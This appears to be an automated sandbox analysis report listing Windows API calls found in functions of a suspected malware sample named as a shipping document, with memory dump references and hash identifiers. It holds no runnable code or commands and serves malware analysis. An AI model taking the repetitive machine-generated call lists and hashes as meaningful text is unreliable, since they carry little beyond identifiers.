                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A21988
                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A219B8
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00A219FF
                                                                                                                                • Part of subcall function 00A22599: GetLastError.KERNEL32(?,?,00A2192D,00000000,00000000,00000001), ref: 00A225AE
                                                                                                                                • Part of subcall function 00A22599: SetEvent.KERNEL32(?,?,00A2192D,00000000,00000000,00000001), ref: 00A225C3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3113390036-3916222277
                                                                                                                              • Opcode ID: c3760845bcbb87761d84d38f177bec2545b38fe1535fa1700909c8878e98a8b7
                                                                                                                              • Instruction ID: af79531edce56b1925dbfb45b3978e8e3bbc3e52192cfee5b7907f2c5e1614e6
                                                                                                                              • Opcode Fuzzy Hash: c3760845bcbb87761d84d38f177bec2545b38fe1535fa1700909c8878e98a8b7
                                                                                                                              • Instruction Fuzzy Hash: AD219FB2500218BFEB21DFA8ED95FBF77BCEB58744F10413AF40596240EB249E4597A1
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B1D35: CreateWindowExW.USER32 ref: 009B1D73
                                                                                                                                • Part of subcall function 009B1D35: GetStockObject.GDI32(00000011), ref: 009B1D87
                                                                                                                                • Part of subcall function 009B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 009B1D91
                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A36493
                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00A3649A
                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A364AF
                                                                                                                              • DestroyWindow.USER32 ref: 00A364B7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                              • String ID: SysAnimate32
                                                                                                                              • API String ID: 4146253029-1011021900
                                                                                                                              • Opcode ID: 7f92b13579a7e888e64257821d22ed28ba0c135aa68a3f1654ce5a0f8559c209
                                                                                                                              • Instruction ID: c408ea50909fc83122d1a18ddef226ca98209c1d6a03f3abfa6ab5432dddd5f7
                                                                                                                              • Opcode Fuzzy Hash: 7f92b13579a7e888e64257821d22ed28ba0c135aa68a3f1654ce5a0f8559c209
                                                                                                                              • Instruction Fuzzy Hash: 46218B71A00205BFEF108FA4EE81EBB37A9EB49364F10C629FA5497190D771CC519760
                                                                                                                              APIs
                                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00A16E65
                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A16E98
                                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00A16EAA
                                                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A16EE4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHandle$FilePipe
                                                                                                                              • String ID: nul
                                                                                                                              • API String ID: 4209266947-2873401336
                                                                                                                              • Opcode ID: 4ab5828702effaece8e41692f8b58f0f829399becfb7f423be2282cc498ef873
                                                                                                                              • Instruction ID: 4a24224be0bb22c3d6cedf18ecc5e2d0da835df170b510591b126a69e251b716
                                                                                                                              • Opcode Fuzzy Hash: 4ab5828702effaece8e41692f8b58f0f829399becfb7f423be2282cc498ef873
                                                                                                                              • Instruction Fuzzy Hash: C5214179600205AFDB209F69DC05AEA7BF8AF54760F204B29FDA1D72D0DB709891CB90
                                                                                                                              APIs
                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A16F32
                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A16F64
                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A16F75
                                                                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A16FAF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHandle$FilePipe
                                                                                                                              • String ID: nul
                                                                                                                              • API String ID: 4209266947-2873401336
                                                                                                                              • Opcode ID: cad3428dc03f52eb9ce048a6c423fb2d8e9ff94f904997908cb738eb61320393
                                                                                                                              • Instruction ID: 3d2af72bef96c48c130236fe2cb99e1dd9c25b8361cc6aa624822fd74b9a113f
                                                                                                                              • Opcode Fuzzy Hash: cad3428dc03f52eb9ce048a6c423fb2d8e9ff94f904997908cb738eb61320393
                                                                                                                              • Instruction Fuzzy Hash: 6321B375A04305EFDB209F69AC04AEA77F8AF45720F204B59FCA1D72D0D7709892CB50
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A1ACDE
                                                                                                                              • GetVolumeInformationW.KERNEL32 ref: 00A1AD32
                                                                                                                              • __swprintf.LIBCMT ref: 00A1AD4B
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A3F910), ref: 00A1AD89
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                              • String ID: %lu
                                                                                                                              • API String ID: 3164766367-685833217
                                                                                                                              • Opcode ID: 20acbd762192fe7160861adc2f3def0140d8a7a8cdba0bdff7e38f5b739fcf11
                                                                                                                              • Instruction ID: a2c0f60cd86ca681550c6aa27bbb1ce8f87591844532c5c9565b49dbc32e813e
                                                                                                                              • Opcode Fuzzy Hash: 20acbd762192fe7160861adc2f3def0140d8a7a8cdba0bdff7e38f5b739fcf11
                                                                                                                              • Instruction Fuzzy Hash: 17215335A00109AFCB10EFA5DD85EEE77B8EF89714B004069F509EB251DB31EA41DB61
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                                • Part of subcall function 00A0A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A0A179
                                                                                                                                • Part of subcall function 00A0A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A0A18C
                                                                                                                                • Part of subcall function 00A0A15C: GetCurrentThreadId.KERNEL32(00000000), ref: 00A0A193
                                                                                                                                • Part of subcall function 00A0A15C: AttachThreadInput.USER32(00000000), ref: 00A0A19A
                                                                                                                              • GetFocus.USER32(00A3F910), ref: 00A0A334
                                                                                                                                • Part of subcall function 00A0A1A5: GetParent.USER32(?), ref: 00A0A1B3
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A0A37D
                                                                                                                              • EnumChildWindows.USER32 ref: 00A0A3A5
                                                                                                                              • __swprintf.LIBCMT ref: 00A0A3BF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                              • String ID: %s%d
                                                                                                                              • API String ID: 1941087503-1110647743
                                                                                                                              • Opcode ID: 63deb0f64305c5f7b6cfb71b33c86913c55b71d488a95e925460baa7c0a3d410
                                                                                                                              • Instruction ID: 0062056959d7c0ba457e4c70e4ef0db1fead02b6b5f5ae9ceff9349ec429b8e2
                                                                                                                              • Opcode Fuzzy Hash: 63deb0f64305c5f7b6cfb71b33c86913c55b71d488a95e925460baa7c0a3d410
                                                                                                                              • Instruction Fuzzy Hash: CE11B175600309BBDF11BFB0ED86FEA7779AF95710F004175B908AA1D2CA7059468B72
                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A2ED1B
                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A2ED4B
                                                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A2EE7E
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A2EEFF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2364364464-0
                                                                                                                              • Opcode ID: f3ec7dcb1279c27b4591a6a57b78f218d78e84efe91d03db3d1725207b5addee
                                                                                                                              • Instruction ID: 4001610aa3aa92a7c63f05362a9b8323c6b9a4f19dc575214bfca31271a3a872
                                                                                                                              • Opcode Fuzzy Hash: f3ec7dcb1279c27b4591a6a57b78f218d78e84efe91d03db3d1725207b5addee
                                                                                                                              • Instruction Fuzzy Hash: 10817371614310AFD720EF68D946F6AB7E5AF88720F04881DF59ADB292D670AC41CB51
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1559183368-0
                                                                                                                              • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                                                                              • Instruction ID: e9e32daad067b3dc2f817dd4160e31beedce7c50b3c52a3de3bb8318ff0359eb
                                                                                                                              • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                                                                              • Instruction Fuzzy Hash: E151A130A40B05DBDB259FA9D88066E77BAAF80320F65CB2BF825963D5D774DE508B40
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 00A30EA5: CharUpperBuffW.USER32(?,?), ref: 00A30EBC
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A30188
                                                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A301C7
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A3020E
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A3023A
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A30247
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3440857362-0
                                                                                                                              • Opcode ID: a21aa39f9e9297bfc503ade677faf6937f80df9540db46bff9912a9d7f907154
                                                                                                                              • Instruction ID: 2f0d70f344b3af181095bf11fe7cb4f831c3d68e30f81859826d3870e7b051a9
                                                                                                                              • Opcode Fuzzy Hash: a21aa39f9e9297bfc503ade677faf6937f80df9540db46bff9912a9d7f907154
                                                                                                                              • Instruction Fuzzy Hash: A7513831218204AFD704EFA8DD95FAAB7E8FF88714F04892DF595872A1DB30E905CB52
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A2DA3B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A2DABE
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A2DADA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A2DB1B
                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A2DB35
                                                                                                                                • Part of subcall function 009B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A1793F,?,?,00000000), ref: 009B5B8C
                                                                                                                                • Part of subcall function 009B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A1793F,?,?,00000000,?,?), ref: 009B5BB0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 327935632-0
                                                                                                                              • Opcode ID: cb42ae56e2e1a60c90a0fa1cf283c7fd14caad2eef376db8ab189de35898f530
                                                                                                                              • Instruction ID: 8b768421d870ed4d20918d57b1b416e65484a64abc2ed44ee2ff4ff78b3ff094
                                                                                                                              • Opcode Fuzzy Hash: cb42ae56e2e1a60c90a0fa1cf283c7fd14caad2eef376db8ab189de35898f530
                                                                                                                              • Instruction Fuzzy Hash: BF513835A00215DFCB00EFA8D594EADBBF4FF49320B058069E959AB362DB30ED45CB90
                                                                                                                              APIs
                                                                                                                              • GetPrivateProfileSectionW.KERNEL32 ref: 00A1E6AB
                                                                                                                              • GetPrivateProfileSectionW.KERNEL32 ref: 00A1E6D4
                                                                                                                              • WritePrivateProfileSectionW.KERNEL32 ref: 00A1E713
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 00A1E738
                                                                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 00A1E740
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1389676194-0
                                                                                                                              • Opcode ID: 94228647086400dbf0c6cd6f5b51be1ff3983ff635df0e680f4788b653789919
                                                                                                                              • Instruction ID: d1414b737a3b3c7a52989ff6517814018c4fec6ce7e49b4a726a562ae1b79b8b
                                                                                                                              • Opcode Fuzzy Hash: 94228647086400dbf0c6cd6f5b51be1ff3983ff635df0e680f4788b653789919
                                                                                                                              • Instruction Fuzzy Hash: 5A513C35A10205DFCF01EFA4CA85AAEBBF5FF49314B148099E949AB362CB31ED51DB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dc9625e1017c2842309743abf54382d485f009a8d8c1bb417d9ac4d3dc42d712
                                                                                                                              • Instruction ID: b5f0be111826fb6b2d639d67779189634bd5549780fac4d4da4dde6c33d004db
                                                                                                                              • Opcode Fuzzy Hash: dc9625e1017c2842309743abf54382d485f009a8d8c1bb417d9ac4d3dc42d712
                                                                                                                              • Instruction Fuzzy Hash: 9C410435E00264BFDB10DF68CC45FA9BBB9EB29360F150365F8A6A72E1C7309D41DA51
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4210589936-0
                                                                                                                              • Opcode ID: 019597ce708ff3a7e71f1646025aeb11ce6d3411aab044aa63eed960fcf3f2eb
                                                                                                                              • Instruction ID: 1b30655d4983499c35559c9dde68db58b89d4d927e3e9a8f02270de02ac8bdce
                                                                                                                              • Opcode Fuzzy Hash: 019597ce708ff3a7e71f1646025aeb11ce6d3411aab044aa63eed960fcf3f2eb
                                                                                                                              • Instruction Fuzzy Hash: 1B418175908105FFCF169F65CC44AEDBBB4FB05360F10432AF868962A1C734AD95DB90
                                                                                                                              APIs
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A0673D
                                                                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00A06789
                                                                                                                              • TranslateMessage.USER32(?), ref: 00A067B2
                                                                                                                              • DispatchMessageW.USER32(?), ref: 00A067BC
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A067CB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2108273632-0
                                                                                                                              • Opcode ID: d8ccc0c392fbc85cfb786e51c15ec48d07046d9e72eba0da89d5b8d633b29f88
                                                                                                                              • Instruction ID: a03175a38a2d894ccab0f5da6590bac9fe8a67f84956ae34ce58642a908c662a
                                                                                                                              • Opcode Fuzzy Hash: d8ccc0c392fbc85cfb786e51c15ec48d07046d9e72eba0da89d5b8d633b29f88
                                                                                                                              • Instruction Fuzzy Hash: CD31C731E0064A9FDB24CFB4AC44FF67BFCAB0130CF148565E425C60E1E765A4AAD7A0
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00A08CF2
                                                                                                                              • PostMessageW.USER32 ref: 00A08D9C
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A08DA4
                                                                                                                              • PostMessageW.USER32 ref: 00A08DB2
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A08DBA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
